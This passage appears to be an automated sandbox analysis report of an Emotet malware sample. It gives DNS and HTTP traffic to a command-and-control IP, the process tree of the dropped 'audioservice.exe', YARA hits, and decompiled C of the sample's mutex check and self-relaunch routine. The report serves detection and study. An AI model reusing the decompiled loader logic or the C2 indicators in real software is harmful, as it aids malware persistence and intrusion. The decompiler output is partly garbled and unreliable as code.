Mar 27, 2021 15:03:24.827533007 CET	58823	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:03:24.889472961 CET	53	58823	8.8.8.8	192.168.2.3
Mar 27, 2021 15:03:35.119246006 CET	57568	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:03:35.175015926 CET	53	57568	8.8.8.8	192.168.2.3
Mar 27, 2021 15:03:37.857461929 CET	50540	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:03:37.914567947 CET	53	50540	8.8.8.8	192.168.2.3
Mar 27, 2021 15:04:09.525345087 CET	54366	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:04:09.577234030 CET	53	54366	8.8.8.8	192.168.2.3
Mar 27, 2021 15:04:10.716814995 CET	53034	53	192.168.2.3	8.8.8.8
Mar 27, 2021 15:04:10.779548883 CET	53	53034	8.8.8.8	192.168.2.3

HTTP Request Dependency Graph

79.172.249.82:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49713	79.172.249.82	443	C:\Windows\SysWOW64\audioservice.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2021 15:02:43.946386099 CET	498	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 79.172.249.82:443 Content-Length: 436 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 97 72 e0 59 98 a6 57 df 28 e7 48 40 d4 d8 66 59 dc e8 1f bb ba 3e 21 1e 38 80 b6 ec ee 2a 1a a3 87 a9 c8 b4 ee ed dc a6 6f 47 9b 1e 06 04 e0 a5 a8 3e 98 71 5b 7c ec 3f d9 e4 3c 6f 39 b8 7e 2a 40 46 cf 1a a4 90 a6 15 44 8e 34 a1 21 30 73 1a e6 7d da 53 34 e9 8b 08 fd d2 65 b7 ef 4e 7b 1b 41 cf 1e 4e 04 67 cc b6 b0 8e b7 39 83 f2 85 7b a1 76 75 0b b7 56 49 19 1d 10 3a 94 65 9b 6e db f7 b7 29 b4 9a 96 57 3d ea 50 0f 80 91 3e 6c 5d 71 bf 0c d3 1d 33 2c 3a 9a 00 cf a7 c7 6e 8d 93 33 f1 a9 fe 49 f2 03 fe be 4b 22 73 87 0a 9f 61 aa f6 e6 a0 a1 63 62 25 cf 29 54 e3 40 05 0a ac 61 fb 48 f7 e2 51 c2 17 4b ed 50 6e 0f 9a 96 21 f2 fd 66 9d 79 03 73 e2 c1 d8 97 fd 28 89 6a 62 09 bd 80 74 21 8d 9c 6f be e5 fe 66 36 c6 f5 62 24 ad 3f ae e1 aa f8 d6 42 cc 1a d8 f1 89 6f d4 95 30 68 64 5c cc 00 d3 be a3 ab ce 3f 52 9f ab 9e f6 9e ca 9b 6b 13 0e ca 26 0e 82 55 62 9c 00 2e 21 f3 b7 c2 9d 7d 9f 04 f3 7e 0f c1 76 1a 7a 4b 82 60 af 42 06 7b 0a 93 6c fe 13 8f b9 4f 78 86 2b 0a ed 48 97 4d 62 66 9c 72 e1 05 9c 40 f9 8e 63 e2 1d 1f ad df 9d ec d9 92 31 7e ae 62 0d 09 5c 09 8c d1 5d d1 bc 4b 7f cb 09 5b 4c 65 2d 57 57 2b e3 5a 97 5b 02 cc 16 fd 31 6b b3 55 c4 2a 4e 8f ca 6b 96 64 58 fe 94 ef e4 92 ec 3c 15 62 55 43 64 8e 63 e9 8e 48 56 b5 de 1f 75 a2 6e 36 87 35 88 1b e3 52 6c ca 2f 39 c7 37 99 59 b5 08 78 45 5b Data Ascii: rYW(H@fY>!8oG>q[\|?<o9~@FD4!0s}S4eN{ANg9{vuVI:en)W=P>l]q3,:n3IK"sacb%)T@aHQKPn!fys(jbt!of6b$?Bo0hd\?Rk&Ub.!}~vzK`B{lOx+HMbfr@c1~b\]K[Le-WW+Z[1kU*NkdX<bUCdcHVun65Rl/97YxE[
Mar 27, 2021 15:02:43.997226954 CET	499	IN	HTTP/1.1 400 Bad Request Date: Sat, 27 Mar 2021 14:02:43 GMT Server: Apache/2.4.25 (Debian) Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: pitEBNziGR.exe PID: 3864 Parent PID: 5704

General

Start time:	15:02:35
Start date:	27/03/2021
Path:	C:\Users\user\Desktop\pitEBNziGR.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\pitEBNziGR.exe'
Imagebase:	0xa80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.194827594.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: pitEBNziGR.exe PID: 5676 Parent PID: 3864

General

Start time:	15:02:36
Start date:	27/03/2021
Path:	C:\Users\user\Desktop\pitEBNziGR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\pitEBNziGR.exe
Imagebase:	0xa80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.195720063.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.202853899.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: audioservice.exe PID: 5952 Parent PID: 568

General

Start time:	15:02:38
Start date:	27/03/2021
Path:	C:\Windows\SysWOW64\audioservice.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\audioservice.exe
Imagebase:	0xa80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.202612718.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.201565611.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: audioservice.exe PID: 5920 Parent PID: 5952

General

Start time:	15:02:39
Start date:	27/03/2021
Path:	C:\Windows\SysWOW64\audioservice.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\audioservice.exe
Imagebase:	0xa80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.461283657.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.202311649.0000000000A81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5404 Parent PID: 568

General

Start time:	15:03:05
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1720 Parent PID: 568

General

Start time:	15:03:16
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 380 Parent PID: 568

General

Start time:	15:03:17
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5948 Parent PID: 568

General

Start time:	15:03:17
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4308 Parent PID: 568

General

Start time:	15:03:17
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5812 Parent PID: 568

General

Start time:	15:03:18
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 1180 Parent PID: 568

General

Start time:	15:03:18
Start date:	27/03/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff690a40000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1260 Parent PID: 568

General

Start time:	15:03:19
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 5488 Parent PID: 1260

General

Start time:	15:04:19
Start date:	27/03/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff69fee0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1632 Parent PID: 5488

General

Start time:	15:04:20
Start date:	27/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: pitEBNziGR.exe PID: 3864 Parent PID: 5704 pitEBNziGR.exeCOMMON

Execution Graph

Execution Coverage:	0.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	531
Total number of Limit Nodes:	3

Executed Functions

Function 00A815B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00A815B0(void* __ebx) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				intOrPtr* _t23;
				void* _t40;
				int _t47;
				WCHAR* _t61;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;

				GetModuleFileNameW(0,  &_v868, 0x104);
				_t61 =  &_v868;
				_t23 = E00A819E0(_t61);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
				 *_t23 =  *_t23 + _t23;
				E00A81830(0xa81004, _t64, 0x4dbac13f,  &_v8);
				_t68 = _v8;
				 *0xa8c200( &_v348, 0x40, _t68, _t66);
				HeapFree(GetProcessHeap(), 0, _t68);
				E00A81830(0xa81000, 4, 0x4dbac13f,  &_v8);
				_t69 = _v8;
				 *0xa8c200( &_v220, 0x40, _t69, _t66);
				HeapFree(GetProcessHeap(), 0, _t69);
				_t70 = CreateEventW(0, 1, 0,  &_v348);
				if(_t70 == 0) {
					L4:
					return 0;
				} else {
					_t40 = CreateMutexW(0, 1,  &_v220); // executed
					_t67 = _t40;
					if(_t67 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t47 == 0) {
								goto L4;
							} else {
								WaitForSingleObject(_t70, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t70);
								CloseHandle(_t67);
								return 1;
							}
						} else {
							SetEvent(_t70);
							CloseHandle(_t70);
							CloseHandle(_t67);
							E00A89C50(0xa81000);
							return 1;
						}
					} else {
						CloseHandle(_t70);
						goto L4;
					}
				}
			}

0x00a815c9
0x00a815cf
0x00a815d5
0x00a815d9
0x00a815df
0x00a815ef
0x00a815f4
0x00a81602
0x00a81615
0x00a8162e
0x00a81633
0x00a81641
0x00a81654
0x00a8166d
0x00a81671
0x00a81692
0x00a81698
0x00a81673
0x00a8167e
0x00a81684
0x00a81688
0x00a816a4
0x00a816d3
0x00a816dc
0x00a816e6
0x00a81707
0x00a8170f
0x00000000
0x00a81711
0x00a81714
0x00a8171d
0x00a81726
0x00a8172d
0x00a81734
0x00a81744
0x00a81744
0x00a816a6
0x00a816a7
0x00a816ae
0x00a816b5
0x00a816bb
0x00a816ca
0x00a816ca
0x00a8168a
0x00a8168b
0x00000000
0x00a8168b
0x00a81688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00A815C9

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

_snwprintf.NTDLL ref: 00A81602
GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8160E
HeapFree.KERNEL32(00000000), ref: 00A81615
_snwprintf.NTDLL ref: 00A81641
GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8164D
HeapFree.KERNEL32(00000000), ref: 00A81654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00A81667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00A8167E
CloseHandle.KERNEL32(00000000), ref: 00A8168B
GetLastError.KERNEL32 ref: 00A81699
SetEvent.KERNEL32(00000000), ref: 00A816A7
CloseHandle.KERNEL32(00000000), ref: 00A816AE
CloseHandle.KERNEL32(00000000), ref: 00A816B5
memset.NTDLL ref: 00A816D3
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A81707
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A81714
CloseHandle.KERNEL32(?), ref: 00A8171D
CloseHandle.KERNEL32(?), ref: 00A81726
CloseHandle.KERNEL32(00000000), ref: 00A8172D
CloseHandle.KERNEL32(00000000), ref: 00A81734

Strings

D, xrefs: 00A816DC

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
String ID: D
API String ID: 2830143876-2746444292
Opcode ID: 4786bfb42db6c87608fdafdd61f67dfb0fa0ad2238e365b80cba75b1a7886714
Instruction ID: 0531a1632fcfc8314b7eb9e8c8656414556068ba75f285255ed857419d745501
Opcode Fuzzy Hash: 4786bfb42db6c87608fdafdd61f67dfb0fa0ad2238e365b80cba75b1a7886714
Instruction Fuzzy Hash: 92415271900118ABEB10EBE4EC8DFEE7B7CEB44721F040255F609E6191EB749A468FB5

Uniqueness

Uniqueness Score: -1.00%

Function 00A81599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00A81599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				short _v876;
				intOrPtr* _t27;
				void* _t44;
				int _t51;
				WCHAR* _t66;
				void* _t71;
				intOrPtr _t73;
				void* _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t85;
				intOrPtr* _t90;

				asm("daa");
				_t71 = __edx -  *_t90;
				asm("salc");
				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
				_t73 =  *__ecx;
				GetModuleFileNameW(0,  &_v876, 0x104);
				_t66 =  &_v876;
				_t27 = E00A819E0(_t66);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
				 *_t27 =  *_t27 + _t27;
				E00A81830(0xa81004, _t71, 0x4dbac13f,  &_v8);
				_t79 = _v8;
				 *0xa8c200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
				HeapFree(GetProcessHeap(), 0, _t79);
				E00A81830(0xa81000, 4, 0x4dbac13f,  &_v8);
				_t80 = _v8;
				 *0xa8c200( &_v220, 0x40, _t80, _t73);
				HeapFree(GetProcessHeap(), 0, _t80);
				_t81 = CreateEventW(0, 1, 0,  &_v348);
				if(_t81 == 0) {
					L5:
					return 0;
				} else {
					_t44 = CreateMutexW(0, 1,  &_v220); // executed
					_t75 = _t44;
					if(_t75 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t51 == 0) {
								goto L5;
							} else {
								WaitForSingleObject(_t81, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t81);
								CloseHandle(_t75);
								return 1;
							}
						} else {
							SetEvent(_t81);
							CloseHandle(_t81);
							CloseHandle(_t75);
							E00A89C50(0xa81000);
							return 1;
						}
					} else {
						CloseHandle(_t81);
						goto L5;
					}
				}
			}

0x00a81599
0x00a8159d
0x00a815a5
0x00a815a6
0x00a815a9
0x00a815c9
0x00a815cf
0x00a815d5
0x00a815d9
0x00a815df
0x00a815ef
0x00a815f4
0x00a81602
0x00a81615
0x00a8162e
0x00a81633
0x00a81641
0x00a81654
0x00a8166d
0x00a81671
0x00a81691
0x00a81698
0x00a81673
0x00a8167e
0x00a81684
0x00a81688
0x00a816a4
0x00a816d3
0x00a816dc
0x00a816e6
0x00a81707
0x00a8170f
0x00000000
0x00a81711
0x00a81714
0x00a8171d
0x00a81726
0x00a8172d
0x00a81734
0x00a81744
0x00a81744
0x00a816a6
0x00a816a7
0x00a816ae
0x00a816b5
0x00a816bb
0x00a816ca
0x00a816ca
0x00a8168a
0x00a8168b
0x00000000
0x00a8168b
0x00a81688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00A815C9

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

_snwprintf.NTDLL ref: 00A81602
GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8160E
HeapFree.KERNEL32(00000000), ref: 00A81615
_snwprintf.NTDLL ref: 00A81641
GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8164D
HeapFree.KERNEL32(00000000), ref: 00A81654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00A81667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00A8167E
CloseHandle.KERNEL32(00000000), ref: 00A8168B
GetLastError.KERNEL32 ref: 00A81699
SetEvent.KERNEL32(00000000), ref: 00A816A7
CloseHandle.KERNEL32(00000000), ref: 00A816AE
CloseHandle.KERNEL32(00000000), ref: 00A816B5

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
String ID:
API String ID: 4183562332-0
Opcode ID: c67089bc14d22dab0fcb5866ecc0f2044307a066b455aca45afc02d3e9a77da1
Instruction ID: 01680230d6aa716c35449a380eee48a554ed7f253a046e21a9c389c99be466bf
Opcode Fuzzy Hash: c67089bc14d22dab0fcb5866ecc0f2044307a066b455aca45afc02d3e9a77da1
Instruction Fuzzy Hash: 4921A671A40155BBEB20EBE0DC4EFDA3B7DEB44722F044191FA09E6191DA305A468FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A81575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00A81575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v4;
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v216;
				short _v344;
				short _v864;
				void* _v880;
				signed char _t34;
				void* _t51;
				int _t58;
				signed char _t71;
				signed char _t73;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t84;
				signed char _t87;
				void* _t89;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t105;
				void* _t127;

				L0:
				while(1) {
					_t84 = __edx;
					_t79 = __ecx;
					_t78 = __ebx;
					_t127 = __fp0 -  *[fs:edx];
					_t34 = __eax + 0x527dd026 | 0x0000004a;
					asm("fistp qword [ecx+ebx]");
					if(__ecx >= _t34) {
						break;
					}
					L14:
					_t127 = _t127 -  *[fs:edx];
					_t71 = _t73 | 0x0000004a;
					asm("retf");
					_t79 = _t82 - _t105;
					asm("daa");
					_push(__ebx);
					if (_t79 < 0) goto L5;
					L15:
					_t87 = _t71;
				}
				L19:
				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
				 *_t34 =  *_t34 + _t34;
				E00A81830(0xa81004, _t84, 0x4dbac13f,  &_v4);
				_t95 = _v4;
				 *0xa8c200( &_v344, 0x40, _t95, _t89);
				HeapFree(GetProcessHeap(), 0, _t95);
				E00A81830(0xa81000, 4, 0x4dbac13f,  &_v4);
				_t96 = _v4;
				 *0xa8c200( &_v216, 0x40, _t96, _t89);
				HeapFree(GetProcessHeap(), 0, _t96);
				_t97 = CreateEventW(0, 1, 0,  &_v344);
				if(_t97 == 0) {
					L22:
					return 0;
				} else {
					_t51 = CreateMutexW(0, 1,  &_v216); // executed
					_t91 = _t51;
					if(_t91 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v88, 0, 0x44);
							_v88.cb = 0x44;
							_v88.dwFlags = 0x80;
							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
							if(_t58 == 0) {
								goto L22;
							} else {
								WaitForSingleObject(_t97, 0xffffffff);
								CloseHandle(_v20);
								CloseHandle(_v20.hThread);
								CloseHandle(_t97);
								CloseHandle(_t91);
								return 1;
							}
						} else {
							SetEvent(_t97);
							CloseHandle(_t97);
							CloseHandle(_t91);
							E00A89C50(0xa81000);
							return 1;
						}
					} else {
						CloseHandle(_t97);
						goto L22;
					}
				}
			}

0x00a81575
0x00a81575
0x00a81575
0x00a81575
0x00a81575
0x00a8157b
0x00a8157e
0x00a81580
0x00a81585
0x00000000
0x00000000
0x00a81587
0x00a81587
0x00a8158a
0x00a8158c
0x00a8158f
0x00a81591
0x00a81592
0x00a81593
0x00a81594
0x00a81594
0x00a81594
0x00a815d9
0x00a815d9
0x00a815df
0x00a815ef
0x00a815f4
0x00a81602
0x00a81615
0x00a8162e
0x00a81633
0x00a81641
0x00a81654
0x00a8166d
0x00a81671
0x00a81691
0x00a81698
0x00a81673
0x00a8167e
0x00a81684
0x00a81688
0x00a816a4
0x00a816d3
0x00a816dc
0x00a816e6
0x00a81707
0x00a8170f
0x00000000
0x00a81711
0x00a81714
0x00a8171d
0x00a81726
0x00a8172d
0x00a81734
0x00a81744
0x00a81744
0x00a816a6
0x00a816a7
0x00a816ae
0x00a816b5
0x00a816bb
0x00a816ca
0x00a816ca
0x00a8168a
0x00a8168b
0x00000000
0x00a8168b
0x00a81688

APIs

_snwprintf.NTDLL ref: 00A81602
GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8160E
HeapFree.KERNEL32(00000000), ref: 00A81615
_snwprintf.NTDLL ref: 00A81641
